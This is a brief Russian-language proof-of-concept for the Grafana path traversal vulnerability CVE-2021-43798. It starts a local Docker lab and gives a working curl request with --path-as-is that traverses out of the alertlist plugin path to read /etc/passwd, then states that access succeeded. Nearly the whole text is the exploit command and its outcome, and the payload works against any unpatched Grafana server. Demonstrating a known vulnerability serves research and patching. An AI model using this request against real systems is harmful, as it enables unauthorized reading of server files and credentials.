
Эксплойт для демонстрации концепции уязвимости обхода пути Grafana (CVE-2021-43798), позволяющий несанкционированное чтение файлов через обход каталогов в путях плагинов.
docker-compose up -d
curl --path-as-is http://localhost:3000/public/plugins/alertlist/../../../../../../../../etc/passwd
Таким образом удалось получить доступ к etc/passwd.